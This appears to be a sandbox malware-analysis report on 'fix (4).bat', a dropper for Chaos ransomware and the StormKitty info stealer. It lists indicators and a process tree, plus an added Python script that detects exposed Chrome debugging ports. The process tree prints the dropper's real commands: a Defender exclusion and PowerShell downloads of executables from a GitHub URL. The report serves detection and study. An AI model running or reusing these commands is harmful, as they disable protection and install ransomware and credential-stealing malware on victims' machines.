Analysis
max time kernel
109s
max time network
117s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags
arch:x64, arch:x86, image:win11-20250313-en, locale:en-us, os:windows11-21h2-x64, system
submitted
24/03/2025, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
fix (4).bat
Resource
win11-20250313-en
General
Target
fix (4).bat
Size
2KB
MD5
160b408ccc1bd513057cba516f4436e7
SHA1
0deecfee13ebc656eecc6aaab2a8978bc93268d0
SHA256
50c4082ed4c65e96649e53ba20fec89ead550d4774901dcccaf562db79a9e3e4
SHA512
74777e896abd4ca6f4282a1dff09c133f95ecd17f1bb48140fce2f2cca615e5be034950cdf8d3ad3846338f442c8e326fac69ef1b18104bd344e7cd33bdec933
Malware Config
Signatures
Chaos
Ransomware family first seen in June 2021.
Chaos Ransomware 2 IoCs
resource yara_rule
behavioral1/files/0x001900000002b08e-44.dat family_chaos
behavioral1/memory/2944-48-0x00000000007B0000-0x00000000007D8000-memory.dmp family_chaos
Chaos family
StormKitty
StormKitty is an open source info stealer written in C#.
StormKitty payload 2 IoCs
resource yara_rule
behavioral1/files/0x001d00000002b08f-47.dat family_stormkitty
behavioral1/memory/4880-59-0x0000000000F80000-0x0000000000FC4000-memory.dmp family_stormkitty
Stormkitty family
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process
3460 bcdedit.exe
5080 bcdedit.exe
Blocklisted process makes network request 4 IoCs
flow pid Process
2 5088 powershell.exe
4 5088 powershell.exe
5 2844 powershell.exe
6 2844 powershell.exe
Deletes backup catalog 1 IoCs
pid Process
1032 wbadmin.exe
Disables Task Manager via registry modification
Downloads MZ/PE file 2 IoCs
flow pid Process
4 5088 powershell.exe
6 2844 powershell.exe
Uses browser remote debugging 2 TTPs 5 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid Process
1928 chrome.exe
5036 chrome.exe
2604 chrome.exe
928 chrome.exe
2448 chrome.exe
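A host-side check for this signature, added here as an example (it is not code from the report or from StormKitty): a browser launched with --remote-debugging-port, as chrome.exe is in the process tree below, serves unauthenticated HTTP on that port, and GET /json lists every open tab together with a WebSocket endpoint through which a DevTools client can drive the tab and read its cookies. The script only enumerates such listeners and reports which sites' sessions would be reachable; it does not open any tab. The port list is an assumption, and SAMPLE_LIST is a constructed /json response used to exercise the parser offline.

```python
"""Find a browser on this host that answers the DevTools protocol.

Added example, not from the report or from StormKitty. Enumerates only: which
port listens, which browser answers, and which web origins it exposes.
"""
import json
import socket
from typing import Dict, List
from urllib.request import urlopen

DEBUG_PORTS = (9222, 9223, 9229)   # assumption: common defaults; 9222 is the one in the report

# Constructed sample of what GET /json returns on an exposed browser.
SAMPLE_LIST = json.dumps([
    {"id": "A1", "type": "page", "title": "Inbox", "url": "https://mail.example.test/inbox",
     "webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/page/A1"},
    {"id": "B2", "type": "page", "title": "New Tab", "url": "chrome://newtab/",
     "webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/page/B2"},
    {"id": "C3", "type": "background_page", "title": "Ext", "url": "chrome-extension://abc/bg.html",
     "webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/page/C3"},
])


def parse_targets(list_json: str) -> List[Dict[str, str]]:
    """Reduce the /json listing to the fields that matter for triage."""
    return [{"type": t.get("type", ""), "url": t.get("url", ""),
             "ws": t.get("webSocketDebuggerUrl", "")} for t in json.loads(list_json)]


def exposed_origins(targets: List[Dict[str, str]]) -> List[str]:
    """Web origins whose cookies and sessions a DevTools client could drive.
    Only http/https page targets count; chrome:// and extension pages are skipped."""
    origins = set()
    for t in targets:
        if t["type"] == "page" and t["url"].startswith(("http://", "https://")):
            scheme, rest = t["url"].split("://", 1)
            origins.add(f"{scheme}://{rest.split('/', 1)[0]}")
    return sorted(origins)


def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def probe(host: str = "127.0.0.1", ports=DEBUG_PORTS) -> List[dict]:
    """Report every DevTools listener found, with browser version and exposed origins."""
    found = []
    for port in ports:
        if not port_open(host, port):
            continue
        try:
            with urlopen(f"http://{host}:{port}/json/version", timeout=2) as r:
                version = json.load(r)
            with urlopen(f"http://{host}:{port}/json", timeout=2) as r:
                targets = parse_targets(r.read().decode())
        except (OSError, ValueError):
            continue   # something other than a DevTools endpoint owns the port
        found.append({"port": port, "browser": version.get("Browser", "?"),
                      "targets": len(targets), "origins": exposed_origins(targets)})
    return found


if __name__ == "__main__":
    for hit in probe():
        print(f"port {hit['port']}: {hit['browser']} exposes {hit['targets']} targets; origins: {hit['origins']}")
```

On a host where the tree below has run, `probe()` returns an entry for port 9222 with the Chrome version string and the origins of whatever tabs the stealer opened; an empty list means no local DevTools endpoint is exposed. The --window-position=-2400,-2400 in the launch keeps the window off-screen, so the user sees nothing while the port is open.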
Drops startup file 3 IoCs
description ioc Process
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt svchost.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe
Executes dropped EXE 3 IoCs
pid Process
2944 build.exe
4880 kernelv.exe
2036 svchost.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials and other secrets.
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Command and Scripting Interpreter: PowerShell 3 IoCs
pid Process
3396 powershell.exe
5088 powershell.exe
2844 powershell.exe
Drops desktop.ini file(s) 64 IoCs
description ioc Process
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini svchost.exe
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe
File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe
File opened for modification C:\Users\Public\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe
File opened for modification C:\Users\Public\AccountPictures\desktop.ini svchost.exe
File opened for modification C:\Users\Public\Libraries\desktop.ini svchost.exe
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1136229799-3442283115-138161576-1000\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini svchost.exe
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini svchost.exe
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe
File opened for modification C:\Users\Public\Downloads\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe
File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe
File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe
File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc
1 ipinfo.io
7 ipinfo.io
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xboyrybqu.jpg" svchost.exe
Drops file in Windows directory 1 IoCs
description ioc Process
File opened for modification C:\Windows\SystemTemp chrome.exe
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process
3396 powershell.exe
1660 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kernelv.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process
4576 cmd.exe
3252 netsh.exe
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 kernelv.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier kernelv.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process
1920 vssadmin.exe
Modifies registry class 5 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings svchost.exe
Key created \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe
Opens file in notepad (likely ransom note) 1 IoCs
pid Process
2736 NOTEPAD.EXE
Runs net.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process
2036 svchost.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process
3396 powershell.exe
3396 powershell.exe
5088 powershell.exe
5088 powershell.exe
2844 powershell.exe
2844 powershell.exe
2944 build.exe
2944 build.exe
2944 build.exe
1660 powershell.exe
1660 powershell.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
2944 build.exe
2944 build.exe
2944 build.exe
2944 build.exe
2036 svchost.exe
2036 svchost.exe
2036 svchost.exe
4880 kernelv.exe
4880 kernelv.exe
4880 kernelv.exe
2036 svchost.exe
2036 svchost.exe
2036 svchost.exe
2036 svchost.exe
2036 svchost.exe
2036 svchost.exe
2036 svchost.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process
1928 chrome.exe
1928 chrome.exe
1928 chrome.exe
1928 chrome.exe
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process
Token: SeDebugPrivilege 3396 powershell.exe
Token: SeDebugPrivilege 5088 powershell.exe
Token: SeDebugPrivilege 2844 powershell.exe
Token: SeDebugPrivilege 2944 build.exe
Token: SeDebugPrivilege 1660 powershell.exe
Token: SeDebugPrivilege 4880 kernelv.exe
Token: SeDebugPrivilege 2036 svchost.exe
Token: SeShutdownPrivilege 1928 chrome.exe
Token: SeCreatePagefilePrivilege 1928 chrome.exe
Token: SeShutdownPrivilege 1928 chrome.exe
Token: SeCreatePagefilePrivilege 1928 chrome.exe
Token: SeBackupPrivilege 2168 vssvc.exe
Token: SeRestorePrivilege 2168 vssvc.exe
Token: SeAuditPrivilege 2168 vssvc.exe
Token: SeIncreaseQuotaPrivilege 3980 WMIC.exe
Token: SeSecurityPrivilege 3980 WMIC.exe
Token: SeTakeOwnershipPrivilege 3980 WMIC.exe
Token: SeLoadDriverPrivilege 3980 WMIC.exe
Token: SeSystemProfilePrivilege 3980 WMIC.exe
Token: SeSystemtimePrivilege 3980 WMIC.exe
Token: SeProfSingleProcessPrivilege 3980 WMIC.exe
Token: SeIncBasePriorityPrivilege 3980 WMIC.exe
Token: SeCreatePagefilePrivilege 3980 WMIC.exe
Token: SeBackupPrivilege 3980 WMIC.exe
Token: SeRestorePrivilege 3980 WMIC.exe
Token: SeShutdownPrivilege 3980 WMIC.exe
Token: SeDebugPrivilege 3980 WMIC.exe
Token: SeSystemEnvironmentPrivilege 3980 WMIC.exe
Token: SeRemoteShutdownPrivilege 3980 WMIC.exe
Token: SeUndockPrivilege 3980 WMIC.exe
Token: SeManageVolumePrivilege 3980 WMIC.exe
Token: 33 3980 WMIC.exe
Token: 34 3980 WMIC.exe
Token: 35 3980 WMIC.exe
Token: 36 3980 WMIC.exe
Token: SeIncreaseQuotaPrivilege 3980 WMIC.exe
Token: SeSecurityPrivilege 3980 WMIC.exe
Token: SeTakeOwnershipPrivilege 3980 WMIC.exe
Token: SeLoadDriverPrivilege 3980 WMIC.exe
Token: SeSystemProfilePrivilege 3980 WMIC.exe
Token: SeSystemtimePrivilege 3980 WMIC.exe
Token: SeProfSingleProcessPrivilege 3980 WMIC.exe
Token: SeIncBasePriorityPrivilege 3980 WMIC.exe
Token: SeCreatePagefilePrivilege 3980 WMIC.exe
Token: SeBackupPrivilege 3980 WMIC.exe
Token: SeRestorePrivilege 3980 WMIC.exe
Token: SeShutdownPrivilege 3980 WMIC.exe
Token: SeDebugPrivilege 3980 WMIC.exe
Token: SeSystemEnvironmentPrivilege 3980 WMIC.exe
Token: SeRemoteShutdownPrivilege 3980 WMIC.exe
Token: SeUndockPrivilege 3980 WMIC.exe
Token: SeManageVolumePrivilege 3980 WMIC.exe
Token: 33 3980 WMIC.exe
Token: 34 3980 WMIC.exe
Token: 35 3980 WMIC.exe
Token: 36 3980 WMIC.exe
Token: SeShutdownPrivilege 1928 chrome.exe
Token: SeCreatePagefilePrivilege 1928 chrome.exe
Token: SeBackupPrivilege 4296 wbengine.exe
Token: SeRestorePrivilege 4296 wbengine.exe
Token: SeSecurityPrivilege 4296 wbengine.exe
Token: SeShutdownPrivilege 1928 chrome.exe
Token: SeCreatePagefilePrivilege 1928 chrome.exe
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process
1928 chrome.exe
1928 chrome.exe
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 4876 wrote to memory of 668 4876 cmd.exe 82
PID 4876 wrote to memory of 668 4876 cmd.exe 82
PID 668 wrote to memory of 232 668 net.exe 83
PID 668 wrote to memory of 232 668 net.exe 83
PID 4876 wrote to memory of 3396 4876 cmd.exe 84
PID 4876 wrote to memory of 3396 4876 cmd.exe 84
PID 4876 wrote to memory of 5088 4876 cmd.exe 86
PID 4876 wrote to memory of 5088 4876 cmd.exe 86
PID 4876 wrote to memory of 2844 4876 cmd.exe 87
PID 4876 wrote to memory of 2844 4876 cmd.exe 87
PID 4876 wrote to memory of 2944 4876 cmd.exe 88
PID 4876 wrote to memory of 2944 4876 cmd.exe 88
PID 4876 wrote to memory of 4880 4876 cmd.exe 89
PID 4876 wrote to memory of 4880 4876 cmd.exe 89
PID 4876 wrote to memory of 4880 4876 cmd.exe 89
PID 4876 wrote to memory of 1660 4876 cmd.exe 90
PID 4876 wrote to memory of 1660 4876 cmd.exe 90
PID 4880 wrote to memory of 4576 4880 kernelv.exe 91
PID 4880 wrote to memory of 4576 4880 kernelv.exe 91
PID 4880 wrote to memory of 4576 4880 kernelv.exe 91
PID 4576 wrote to memory of 2476 4576 cmd.exe 93
PID 4576 wrote to memory of 2476 4576 cmd.exe 93
PID 4576 wrote to memory of 2476 4576 cmd.exe 93
PID 4576 wrote to memory of 3252 4576 cmd.exe 95
PID 4576 wrote to memory of 3252 4576 cmd.exe 95
PID 4576 wrote to memory of 3252 4576 cmd.exe 95
PID 4576 wrote to memory of 3428 4576 cmd.exe 96
PID 4576 wrote to memory of 3428 4576 cmd.exe 96
PID 4576 wrote to memory of 3428 4576 cmd.exe 96
PID 4880 wrote to memory of 1008 4880 kernelv.exe 97
PID 4880 wrote to memory of 1008 4880 kernelv.exe 97
PID 4880 wrote to memory of 1008 4880 kernelv.exe 97
PID 2944 wrote to memory of 2036 2944 build.exe 101
PID 2944 wrote to memory of 2036 2944 build.exe 101
PID 4880 wrote to memory of 1928 4880 kernelv.exe 102
PID 4880 wrote to memory of 1928 4880 kernelv.exe 102
PID 1928 wrote to memory of 1772 1928 chrome.exe 103
PID 1928 wrote to memory of 1772 1928 chrome.exe 103
PID 1928 wrote to memory of 4752 1928 chrome.exe 104
PID 1928 wrote to memory of 4752 1928 chrome.exe 104
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
PID 1928 wrote to memory of 2860 1928 chrome.exe 106
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
outlook_office_path 1 IoCs
description ioc Process
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
outlook_win_path 1 IoCs
description ioc Process
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
Processes
C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fix (4).bat"
  - Suspicious use of WriteProcessMemory
  PID:4876
    C:\Windows\system32\net.exe
      net session
      - Suspicious use of WriteProcessMemory
      PID:668
        C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          PID:232
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
      - Command and Scripting Interpreter: PowerShell
      - Hide Artifacts: Ignore Process Interrupts
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:3396
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
      - Blocklisted process makes network request
      - Downloads MZ/PE file
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:5088
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
      - Blocklisted process makes network request
      - Downloads MZ/PE file
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:2844
    C:\Users\Admin\AppData\Local\Temp\build.exe
      "C:\Users\Admin\AppData\Local\Temp\build.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
